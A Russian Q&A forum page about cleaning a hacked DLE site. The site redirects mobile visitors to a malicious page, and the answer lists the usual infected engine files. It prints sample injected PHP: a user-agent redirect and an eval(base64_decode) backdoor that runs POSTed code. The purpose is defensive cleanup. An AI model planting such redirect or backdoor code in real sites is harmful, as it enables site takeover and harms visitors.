Взломали DLE: мобильный редирект

0 голосов
273 просмотров
Всем привет, сегодня зашёл в Яндекс Вебмастер и увидел уведомление о том, что на моём сайте, который работает на движке DLE обнаружен вредоносный код. Оказалось, что какой - то злодей внедрил как - то код, который перекидывает пользователей, зашедших с мобильных устройств на вредоносный сайт. Первым делом проверил. htaccess - но там всё чисто, восстановил на всякий случай его из бекапа. Подскажите где искать этот вредоносный код, и как исправить последствия взлома DLE?
Вопрос задан 20 Июнь, 14 от пользователя Серёга в категории Интернет

1 Ответ

0 голосов

Добрый день, Сергей. Первым делом смените пароли на ftp, и после этого приступайте к ликвидации последствий взлома.

Обычно скрипт мобильного редиректа злоумышленники внедряют в следующие файлы DLE:

  • /engine - engine.php
  • /engine - init.php
  • /engine/data - config.php
  • /engine/data - dbconfig.php

Также в корне сайта может быть размещён файл index.html

Код может выглядеть так:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'], "iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'], "Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'], "webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'], "BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'], "iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: злодейский сайт/');
}
if (strpos($_SERVER['HTTP_USER_AGENT'], "iPhone") || strpos($_SERVER['HTTP_USER_AGENT'], "Android") || strpos($_SERVER['HTTP_USER_AGENT'], "webOS") || strpos($_SERVER['HTTP_USER_AGENT'], "BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'], "iPod")) header('Location: злодейский сайт/');
if(! empty($_POST['update'])) eval(base64_decode($_POST['update']));

Хотя вариаций его много. Поэтому обращайте внимание на все строки, содержащие в себе элемент глобального супермассива $_SERVER['HTTP_USER_AGENT']. Найдя вредоносный код, смело его удаляйте. Для надёжности можете провести поиск по всем файлам сайта на предмет наличия слов  iPhone, Android.

После того, как код нашли и удалили, в Яндекс. Вебмастере отправьте сайт на перепроверку. Если всё ок, то предупреждение о том, что сайт может угрожать безопасности компьютера исчезнет.

Ответ 20 Июнь, 14 от пользователя boss (2,156 баллов)

Похожие вопросы

0 голосов
0 ответов
0 голосов
1 ответ
Вопрос задан 29 Июль, 15 от пользователя Наташа в категории Телефония
+1 голос
1 ответ
Вопрос задан 28 Май, 14 от пользователя Степан в категории Телефония
0 голосов
1 ответ
Вопрос задан 25 Март, 14 от пользователя Кристина в категории Советы и идеи
...